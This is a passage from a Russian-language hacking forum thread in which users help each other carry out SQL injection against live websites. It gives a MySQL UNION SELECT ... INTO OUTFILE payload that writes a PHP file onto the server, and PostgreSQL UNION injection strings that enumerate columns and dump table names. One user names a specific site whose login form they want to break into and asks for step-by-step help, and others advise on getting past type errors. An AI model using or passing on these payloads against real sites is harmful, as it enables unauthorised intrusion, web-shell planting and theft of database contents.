select distinct id_user from....

Тебе ж уже вроде написали.

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --

А вообще читай /thread43966.html

Этот метод работает не везде.

https://forum.antichat.net/thread98525.html

ребят такой вопрос, вообщем на одном сайте нашёл скуль инж (_http://www.bittu.org.ru//comtech/?q=node/21), формируется в методом POST если в если в поле логин ввести ковычку, выводит warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/aptech/includes/common.inc(1547) : eval()'d code on line 42.

я не очень понимаю в инъекциях, точнее нихрена я не понимаю, помогите плз! каким образом мне вообще формировать запросы к БД, авторизациями?

P.S если есть какой нибудь добрый дядька кто проконсультирует в этом вопросе, милости прошу icq 3300890.

подобрал число колонок на PostgreSQL (PostgreSQL 8.1.11 on i686-pc-linux-gnu)

1+union+select+null,null,null,null,null,null,null, null,null,null,null+--+

сделал

1+union+select+table_name,table_name,table_name,ta ble_name,table_name,table_name,table_name,table_na me,table_name,table_name,table_name+from+informati on_schema.tables+--+

пишет

Query failed: ERROR: UNION types integer and character varying cannot be matched in

Как обойти?

ты сначала вывод определи в какой колонке идет..потом уже запрос делай, и еще все зависит от версии постгре...в новых есть INFORMATION_SCHEMA.TABLES а в старых пользуйся PG_TABLES

Это несовпадение типов данных, вывод напрашивается сам по себе.

в том то и проблема что не могу определить какое поле выводится, если null,null,null то все нормально а если числовое значение делаю т.е. 1,2,3 и т.д. ошибку выводит

cast(table_name+as+int) тоже не канает

Тип колонки вам придется подбирать вручную типа

и искать текстовое поле для вывода.

ЗЫ. Со статьей /thread35599.html ознакомились?